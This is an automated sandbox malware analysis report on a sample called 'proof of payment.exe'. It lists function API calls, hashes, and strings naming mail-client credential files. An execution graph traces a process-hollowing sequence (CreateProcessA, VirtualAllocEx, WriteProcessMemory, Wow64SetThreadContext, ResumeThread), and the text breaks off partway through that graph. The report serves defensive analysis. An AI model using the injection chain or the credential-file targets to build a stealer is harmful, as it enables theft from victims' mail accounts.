                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                      • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                      • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                      • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                      • API String ID: 4036392271-1520055953
                                      • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                      • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                      • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                      • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                      • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                      • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                      • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                      • _free.LIBCMT ref: 100071B8
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                      • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                      • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                      • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                      • _free.LIBCMT ref: 10005BB4
                                      • _free.LIBCMT ref: 10005BDB
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                      • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                      • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                      • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                      • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                      • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat
                                      • String ID:
                                      • API String ID: 493641738-0
                                      • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                      • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                      • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                      • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 100091D0
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 100091E2
                                      • _free.LIBCMT ref: 100091F4
                                      • _free.LIBCMT ref: 10009206
                                      • _free.LIBCMT ref: 10009218
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                      • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                      • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                      • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 1000536F
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 10005381
                                      • _free.LIBCMT ref: 10005394
                                      • _free.LIBCMT ref: 100053A5
                                      • _free.LIBCMT ref: 100053B6
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                      • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                      • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                      • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\proof of payment.exe,00000104), ref: 10004C1D
                                      • _free.LIBCMT ref: 10004CE8
                                      • _free.LIBCMT ref: 10004CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\proof of payment.exe
                                      • API String ID: 2506810119-946216651
                                      • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                      • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                      • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                      • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                      • __freea.LIBCMT ref: 100087D5
                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                      • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                      • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                      • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                      • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                      • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                      • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                      • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 1000655C
                                        • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                        • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                        • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                      • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                      • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: : $Se.
                                      • API String ID: 4218353326-4089948878
                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                        • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: Unknown exception
                                      • API String ID: 3476068407-410509341
                                      • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                      • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                      • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                      • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:9.8%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:211
                                      Total number of Limit Nodes:14
                                      execution_graph 39730 99d01c 39731 99d034 39730->39731 39732 99d08e 39731->39732 39735 4b50ad4 39731->39735 39744 4b52c09 39731->39744 39736 4b50adf 39735->39736 39737 4b52c79 39736->39737 39740 4b52c69 39736->39740 39769 4b50bfc 39737->39769 39739 4b52c77 39753 4b52da0 39740->39753 39758 4b52e6c 39740->39758 39764 4b52d90 39740->39764 39747 4b52c45 39744->39747 39745 4b52c79 39746 4b50bfc CallWindowProcW 39745->39746 39749 4b52c77 39746->39749 39747->39745 39748 4b52c69 39747->39748 39750 4b52da0 CallWindowProcW 39748->39750 39751 4b52d90 CallWindowProcW 39748->39751 39752 4b52e6c CallWindowProcW 39748->39752 39750->39749 39751->39749 39752->39749 39755 4b52db4 39753->39755 39754 4b52e40 39754->39739 39773 4b52e58 39755->39773 39776 4b52e48 39755->39776 39759 4b52e2a 39758->39759 39760 4b52e7a 39758->39760 39762 4b52e58 CallWindowProcW 39759->39762 39763 4b52e48 CallWindowProcW 39759->39763 39761 4b52e40 39761->39739 39762->39761 39763->39761 39766 4b52db4 39764->39766 39765 4b52e40 39765->39739 39767 4b52e58 CallWindowProcW 39766->39767 39768 4b52e48 CallWindowProcW 39766->39768 39767->39765 39768->39765 39770 4b50c07 39769->39770 39771 4b5435a CallWindowProcW 39770->39771 39772 4b54309 39770->39772 39771->39772 39772->39739 39774 4b52e69 39773->39774 39779 4b54293 39773->39779 39774->39754 39777 4b54293 CallWindowProcW 39776->39777 39778 4b52e69 39776->39778 39777->39778 39778->39754 39780 4b50bfc CallWindowProcW 39779->39780 39781 4b542aa 39780->39781 39781->39774 39782 69103c4 39787 6911de9 39782->39787 39803 6911e5e 39782->39803 39820 6911df8 39782->39820 39783 69103d3 39788 6911dec 39787->39788 39796 6911e1a 39788->39796 39836 6912272 39788->39836 39839 69125ed 39788->39839 39844 69123ca 39788->39844 39848 691260b 39788->39848 39851 69129eb 39788->39851 39855 6912364 39788->39855 39860 6912465 39788->39860 39866 69125a1 39788->39866 39870 69122e1 39788->39870 39875 691247e 39788->39875 39879 6912377 39788->39879 39884 69122d7 39788->39884 39888 69125b4 39788->39888 39796->39783 39804 6911dec 39803->39804 39805 6911e61 39803->39805 39806 6911e1a 39804->39806 39807 6912272 CreateProcessA 39804->39807 39808 69125b4 Wow64SetThreadContext 39804->39808 39809 69122d7 ReadProcessMemory 39804->39809 39810 6912377 2 API calls 39804->39810 39811 691247e ReadProcessMemory 39804->39811 39812 69122e1 2 API calls 39804->39812 39813 69125a1 Wow64SetThreadContext 39804->39813 39814 6912465 2 API calls 39804->39814 39815 6912364 2 API calls 39804->39815 39816 69129eb ReadProcessMemory 39804->39816 39817 691260b WriteProcessMemory 39804->39817 39818 69123ca WriteProcessMemory 39804->39818 39819 69125ed 2 API calls 39804->39819 39806->39783 39807->39806 39808->39806 39809->39806 39810->39806 39811->39806 39812->39806 39813->39806 39814->39806 39815->39806 39816->39806 39817->39806 39818->39806 39819->39806 39821 6911e12 39820->39821 39822 6912272 CreateProcessA 39821->39822 39823 69125b4 Wow64SetThreadContext 39821->39823 39824 69122d7 ReadProcessMemory 39821->39824 39825 6912377 2 API calls 39821->39825 39826 691247e ReadProcessMemory 39821->39826 39827 69122e1 2 API calls 39821->39827 39828 69125a1 Wow64SetThreadContext 39821->39828 39829 6911e1a 39821->39829 39830 6912465 2 API calls 39821->39830 39831 6912364 2 API calls 39821->39831 39832 69129eb ReadProcessMemory 39821->39832 39833 691260b WriteProcessMemory 39821->39833 39834 69123ca WriteProcessMemory 39821->39834 39835 69125ed 2 API calls 39821->39835 39822->39829 39823->39829 39824->39829 39825->39829 39826->39829 39827->39829 39828->39829 39829->39783 39830->39829 39831->39829 39832->39829 39833->39829 39834->39829 39835->39829 39891 686f850 39836->39891 39840 69125fa 39839->39840 39841 69122fc 39839->39841 39841->39839 39895 6912f60 39841->39895 39900 6912f4f 39841->39900 39845 69123d3 39844->39845 39913 686f5c8 39845->39913 39850 686f5c8 WriteProcessMemory 39848->39850 39849 6912639 39850->39849 39853 69122cd 39851->39853 39852 69122df 39852->39796 39853->39852 39917 686f6b8 39853->39917 39856 69122fc 39855->39856 39857 69125fa 39856->39857 39858 6912f60 2 API calls 39856->39858 39859 6912f4f 2 API calls 39856->39859 39858->39856 39859->39856 39861 69128c5 39860->39861 39921 686f508 39861->39921 39863 6912405 39864 686f5c8 WriteProcessMemory 39864->39863 39867 6912724 39866->39867 39925 686eff8 39867->39925 39871 69122eb 39870->39871 39872 69125fa 39871->39872 39873 6912f60 2 API calls 39871->39873 39874 6912f4f 2 API calls 39871->39874 39873->39871 39874->39871 39876 69122cd 39875->39876 39876->39875 39877 69122df 39876->39877 39878 686f6b8 ReadProcessMemory 39876->39878 39877->39796 39878->39876 39883 686f5c8 WriteProcessMemory 39879->39883 39880 69122df 39880->39796 39881 69122cd 39881->39880 39882 686f6b8 ReadProcessMemory 39881->39882 39882->39881 39883->39881 39885 69122cd 39884->39885 39886 69122df 39885->39886 39887 686f6b8 ReadProcessMemory 39885->39887 39886->39796 39887->39885 39890 686eff8 Wow64SetThreadContext 39888->39890 39889 69125ce 39890->39889 39892 686f8d9 CreateProcessA 39891->39892 39894 686fa9b 39892->39894 39896 6912f75 39895->39896 39905 686eb10 39896->39905 39909 686eb08 39896->39909 39897 6912f88 39897->39841 39901 6912f60 39900->39901 39903 686eb10 ResumeThread 39901->39903 39904 686eb08 ResumeThread 39901->39904 39902 6912f88 39902->39841 39903->39902 39904->39902 39906 686eb50 ResumeThread 39905->39906 39908 686eb81 39906->39908 39908->39897 39910 686eb50 ResumeThread 39909->39910 39912 686eb81 39910->39912 39912->39897 39914 686f610 WriteProcessMemory 39913->39914 39916 686f667 39914->39916 39918 686f703 ReadProcessMemory 39917->39918 39920 686f747 39918->39920 39920->39853 39922 686f548 VirtualAllocEx 39921->39922 39924 686f585 39922->39924 39924->39863 39924->39864 39926 686f03d Wow64SetThreadContext 39925->39926 39928 686f085 39926->39928 39996 6912fe8 39997 6913173 39996->39997 39999 691300e 39996->39999 39999->39997 40000 6910b28 39999->40000 40001 6913268 PostMessageW 40000->40001 40002 69132d4 40001->40002 40002->39999 39929 c5ad98 39930 c5ada7 39929->39930 39933 c5ae90 39929->39933 39941 c5ae7f 39929->39941 39934 c5aea1 39933->39934 